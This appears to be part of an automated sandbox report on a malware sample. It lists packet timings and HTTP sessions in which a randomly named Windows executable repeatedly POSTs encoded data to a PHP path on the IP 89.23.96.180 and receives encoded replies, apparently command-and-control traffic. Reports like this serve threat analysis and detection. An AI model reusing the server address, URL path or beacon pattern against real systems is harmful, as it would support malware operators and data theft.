Dec 21, 2024 10:04:06.010272980 CET	80	50018	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.484811068 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.484841108 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.601943970 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.601948023 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.603239059 CET	49826	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.605020046 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.605930090 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.605998039 CET	80	50018	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.606008053 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.606064081 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.606142998 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.724992990 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.725820065 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.725929976 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.726089001 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.845832109 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.952985048 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:07.072767019 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.072827101 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.078032970 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:07.198101044 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.198132992 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.198185921 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.770970106 CET	80	49808	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:07.771058083 CET	49808	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:07.984081030 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.030965090 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.103303909 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.155972004 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.216196060 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.265358925 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.340126991 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.390355110 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.466487885 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.466643095 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.466905117 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.586458921 CET	80	50024	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.586472988 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.586530924 CET	50024	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.586586952 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.586894035 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.587162018 CET	80	50025	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.587232113 CET	50025	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:08.706396103 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:08.937341928 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:09.057082891 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:09.057095051 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:09.057151079 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:09.964426041 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:10.015418053 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:10.200381994 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:10.249725103 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:18.871961117 CET	50031	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:18.991703987 CET	80	50031	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:18.991766930 CET	50031	80	192.168.2.5	89.23.96.180

HTTP Request Dependency Graph

89.23.96.180

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49734	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:30.100028038 CET	403	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:30.453583002 CET	344	OUT	Data Raw: 05 05 04 0d 06 0e 01 05 05 06 02 01 02 06 01 06 00 05 05 0e 02 00 03 00 00 55 0e 54 04 01 03 50 0f 03 04 0f 03 01 05 00 0d 00 07 57 00 04 02 04 06 06 0d 0f 0e 0e 01 00 07 06 04 02 04 01 07 58 02 01 0d 5d 07 06 04 54 0e 55 0e 0f 0e 02 0e 52 04 04 Data Ascii: UTPWX]TURU\L~A^PMvb_MweT\|v^`Rx\|ZpylZ^lNe^\|mlcwte~V@B{mn~rW
Dec 21, 2024 10:02:31.475451946 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:31.740101099 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 37 63 0d 0a 56 4a 7e 43 7a 7d 6b 00 7b 4c 64 03 68 5f 5e 5e 7e 64 70 50 7f 06 6a 55 79 4d 5a 07 7d 04 78 05 77 70 69 08 79 07 65 00 61 66 78 00 7d 61 78 01 55 4b 71 42 76 61 77 06 6b 5c 79 07 7c 49 7d 53 79 66 74 41 7e 63 63 49 75 5c 72 5d 77 4f 69 48 6b 71 5f 5c 7e 55 60 0b 7f 64 77 4b 75 5c 7b 06 7c 5c 5b 4a 7d 4e 6a 5e 6c 64 63 5f 78 77 51 59 78 43 63 00 6e 5c 60 4b 7a 73 71 5f 68 59 6c 44 6f 49 74 44 7d 72 52 5b 75 62 7c 03 7a 51 41 5b 6b 5e 6b 52 68 62 65 41 76 52 6b 5c 6f 7c 56 01 77 4e 6e 0d 7a 58 6d 49 7e 6f 7a 04 6c 5f 50 4b 76 63 5e 5f 77 62 7b 5d 77 4f 5c 50 7e 5d 79 5f 77 61 7d 04 61 66 70 09 7f 6f 76 5d 77 6f 60 04 7e 73 6c 01 78 6c 64 5a 6c 63 76 03 7c 6e 70 08 74 67 6c 05 7e 62 65 50 69 53 55 40 6c 0b 7d 5a 7d 61 65 06 7b 5d 46 51 6b 55 6b 52 7f 60 60 42 7d 49 5c 4c 7b 7e 68 5f 7b 71 7b 59 7c 62 7f 01 7e 59 7f 0c 7f 5e 53 08 6d 63 6f 5c 7f 71 64 01 74 70 61 51 7b 5c 79 07 76 76 5a 4b 7c 66 68 4e 7d 48 79 0c 77 62 59 01 7c 5c 75 4c 7f 67 50 0c 78 76 78 41 7e 5d 51 04 75 62 71 07 77 [TRUNCATED] Data Ascii: 57cVJ~Cz}k{Ldh_^^~dpPjUyMZ}xwpiyeafx}axUKqBvawk\y\|I}SyftA~ccIu\r]wOiHkq_\~U`dwKu\{\|\[J}Nj^ldc_xwQYxCcn\`Kzsq_hYlDoItD}rR[ub\|zQA[k^kRhbeAvRk\o\|VwNnzXmI~ozl_PKvc^_wb{]wO\P~]y_wa}afpov]wo`~slxldZlcv\|nptgl~bePiSU@l}Z}ae{]FQkUkR``B}I\L{~h_{q{Y\|b~Y^Smco\qdtpaQ{\yvvZK\|fhN}HywbY\|\uLgPxvxA~]QubqwOu~arK}RpgsvOYzriG}^[xgxxg\|L{CUy\pxsPp^J{gl~r{Mwq^\|l]J\|wR}qW@uBlN{RRKt`rNyqWH~lPzqbuMcvOVwOzNv@wbSuep~\|Wt\|R~cxxRcJ{^fISttg^~rvA}Sc{}f}\i\|N`\|lp`xB~YfxmQx\p\|_sD\|wQ^}zc\|~r\|HwMy@z_qJuH`E\|v`M~XqBvbUKLqLYfC{vZB}]kJu\iNtO[aT~\|d}wwKuOsH{rmG}NyxYZywR{CQKyrR{MT{]NZ{I]^}\gMbrsZj{KdwSqmvBo[lBs[ccaUmXeH~Bj_z\y\}b`g{ZL~Jx^e_tLT\a[sQ\|Bv]`olMh`Dy\|lZ{^j}mRc^\ibrzSYQTn^jfzScT`Mjc{HiOBln`GRaIPc`JjdlUPc~OP`sFQa{[cpmnbDZ{ZP\Z^\|qrQtbYJ\|LaMhY~lfxA~Zh\bqb\ta~X~riXjRVjgsv\{POr^icDT{oZWdSUTdISacKQt~{^^FxwlF~bMt_p\|kA{^UTPvJ\o]FWT[Xle}_[YgUe\|s_G[ZEZtvXcbNS\|eYXaS[\oVPo@pRV\eZo~ZDVY@Z~zsWcdAR~aVRn^VTa [TRUNCATED]
Dec 21, 2024 10:02:31.740257978 CET	366	IN	Data Raw: 06 5c 4e 56 5c 0c 5d 52 61 60 58 76 5e 7a 77 6e 6d 53 54 6f 65 08 4b 52 4b 78 44 79 5f 5c 54 5b 05 70 40 56 61 54 45 50 5f 0a 53 54 01 6f 4d 57 7f 78 05 69 04 01 5d 63 66 71 06 78 59 65 65 79 51 42 50 6a 01 64 45 5b 72 4a 01 6f 04 54 45 6b 06 76 Data Ascii: \NV\]Ra`Xv^zwnmSToeKRKxDy_\T[p@VaTEP_SToMWxi]cfqxYeeyQBPjdE[rJoTEkvERdU]Uzon]~\ZXc`FVsoXu{jnd[[L\|CzUR^PsKVbPIZT\WXcUV[ftQaZ\|_\Xl\sZtvXcbNS\|eYXaSaMU\@coeZGlk\|_EQWkVpvBjn}HjsQyz}Xja@P\|gVSo_RswRkeo~gZ
Dec 21, 2024 10:02:31.947110891 CET	379	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 384 Expect: 100-continue
Dec 21, 2024 10:02:32.296614885 CET	384	OUT	Data Raw: 58 5f 43 5f 5d 5b 57 53 55 5e 55 5a 54 5c 50 54 57 58 5c 55 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_C_][WSU^UZT\PTWX\URSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-<U%-!?1>._$?9(-V#,6%T6V($ <8X*%!_.#Q,
Dec 21, 2024 10:02:32.406435966 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:32.765929937 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 3b 31 54 29 39 28 00 29 3f 2a 55 3e 2e 22 5d 38 1c 33 18 21 2f 39 07 28 3d 2b 10 27 10 38 03 35 04 39 5d 35 2f 33 5e 2a 1b 2e 58 01 1e 22 19 21 20 2d 54 33 11 05 53 29 34 3d 02 29 2e 08 59 26 3f 01 14 25 14 23 05 3c 2a 3c 1c 25 3e 32 5d 2c 01 3f 5f 28 10 37 09 27 36 2b 51 03 1e 26 5d 32 02 23 55 26 23 29 1c 32 10 3e 07 23 10 37 53 3e 38 3f 53 37 5d 21 02 3b 17 06 5d 28 2e 3e 59 3d 38 00 5b 30 2c 28 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989!;1T)9()?U>."]83!/9(=+'859]5/3^.X"! -T3S)4=).Y&?%#<*<%>2],?_(7'6+Q&]2#U&#)2>#7S>8?S7]!;](.>Y=8[0,(2#T-,H1]V0
Dec 21, 2024 10:02:32.849848986 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue
Dec 21, 2024 10:02:33.203216076 CET	2112	OUT	Data Raw: 58 53 43 57 5d 5a 52 57 55 5e 55 5a 54 5c 50 57 57 5d 5c 5b 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSCW]ZRWU^UZT\PWW]\[RRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-,V1>%Q?2".#'? U.:4-1&?#]+>++5!_.#Q,
Dec 21, 2024 10:02:33.310826063 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:33.670953989 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1e 37 15 0f 54 29 3a 02 01 28 2f 04 57 3e 00 08 1b 3b 0b 38 03 22 2f 31 00 2a 2d 05 5f 33 00 05 5d 35 04 2e 04 21 3c 3f 13 3e 0b 2e 58 01 1e 22 1a 34 0a 22 0f 27 2f 30 0e 3d 27 3e 5e 28 07 3e 58 33 3f 37 57 26 3a 37 07 2b 04 0e 51 32 3d 2d 00 2f 06 30 06 3c 07 3c 1d 27 1c 2b 51 03 1e 26 1f 25 05 27 11 25 20 39 1c 32 00 25 5d 37 2e 33 1c 3d 3b 3f 56 23 5d 3a 5e 2f 07 2c 5f 2b 3d 2e 11 29 2b 25 07 33 02 24 09 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 9897T):(/W>;8"/1*-_3]5.!<?>.X"4"'/0='>^(>X3?7W&:7+Q2=-/0<<'+Q&%'% 92%]7.3=;?V#]:^/,_+=.)+%3$$.#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49741	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:32.562841892 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:02:32.921731949 CET	2536	OUT	Data Raw: 5d 55 43 5f 5d 5d 57 52 55 5e 55 5a 54 58 50 50 57 5e 5c 5d 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]UC_]]WRU^UZTXPPW^\]RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9!%>5>")9,'?8V.+5#)\&1(''^+=>%!_.#Q,
Dec 21, 2024 10:02:33.938683987 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:34.174393892 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49744	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:34.703413963 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2532 Expect: 100-continue
Dec 21, 2024 10:02:35.062254906 CET	2532	OUT	Data Raw: 58 55 43 52 5d 5a 57 55 55 5e 55 5a 54 5b 50 56 57 59 5c 5c 52 52 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XUCR]ZWUU^UZT[PVWY\\RRQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-(V&=>!.,$8S.(P4Y%\&T!?' <([+%!_.#Q,
Dec 21, 2024 10:02:36.079175949 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:36.315866947 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49751	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:36.639297009 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:36.984210014 CET	2536	OUT	Data Raw: 5d 51 43 54 5d 58 52 53 55 5e 55 5a 54 58 50 56 57 53 5c 5a 52 5e 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QCT]XRSU^UZTXPVWS\ZR^QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :,&Q>!)Z,/<X'/;:^> 9['16U<'#?>(>!_.#Q,*
Dec 21, 2024 10:02:38.015741110 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:38.252110004 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49757	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:38.631613970 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:38.984097958 CET	2536	OUT	Data Raw: 58 52 46 54 58 5d 57 56 55 5e 55 5a 54 5e 50 56 57 5e 5c 59 52 50 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRFTX]WVU^UZT^PVW^\YRPQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#,!8%>6=6-/8X0?T:8*4&2<$7<$Z=5!_.#Q,2
Dec 21, 2024 10:02:40.007849932 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:40.244170904 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49758	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:38.807656050 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:39.156024933 CET	2112	OUT	Data Raw: 5d 54 46 54 5d 5f 52 52 55 5e 55 5a 54 5e 50 57 57 59 5c 58 52 5f 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TFT]_RRU^UZT^PWWY\XR_Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -"/%>!9/+$<,:;"?>2+'8(+5!_.#Q,2
Dec 21, 2024 10:02:40.186721087 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:40.422753096 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1f 23 3b 2d 11 2b 5c 2f 10 29 3f 22 1f 29 3d 29 04 3b 0b 33 5b 22 12 2a 5f 3e 5b 37 5e 26 3d 37 5d 36 04 2d 5d 20 3c 23 12 3d 0b 2e 58 01 1e 22 1b 34 0a 22 0c 33 01 37 52 2a 27 2d 04 3c 00 39 05 33 2f 24 09 31 2a 19 00 2b 03 27 09 31 04 2e 58 2d 3f 01 10 3f 00 24 55 30 1c 2b 51 03 1e 26 5a 24 2c 2f 52 26 1d 35 1c 32 3e 2d 14 20 3d 2c 0b 29 06 28 0e 34 28 3d 06 2c 2a 2b 01 3c 2d 08 12 2a 16 22 12 33 5a 3c 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989#;-+\/)?")=);3["_>[7^&=7]6-] <#=.X"4"37R'-<93/$1+'1.X-??$U0+Q&Z$,/R&52>- =,)(4(=,+<-*"3Z<2#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49765	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:41.287405968 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:02:41.640348911 CET	2536	OUT	Data Raw: 5d 52 43 54 58 5d 57 56 55 5e 55 5a 54 53 50 51 57 5d 5c 5a 52 55 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]RCTX]WVU^UZTSPQW]\ZRUQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .0U&*?2)\98'0R.9V /-\2!+(?>+>%!_.#Q,
Dec 21, 2024 10:02:42.665683985 CET	25	IN	HTTP/1.1 100 Continue
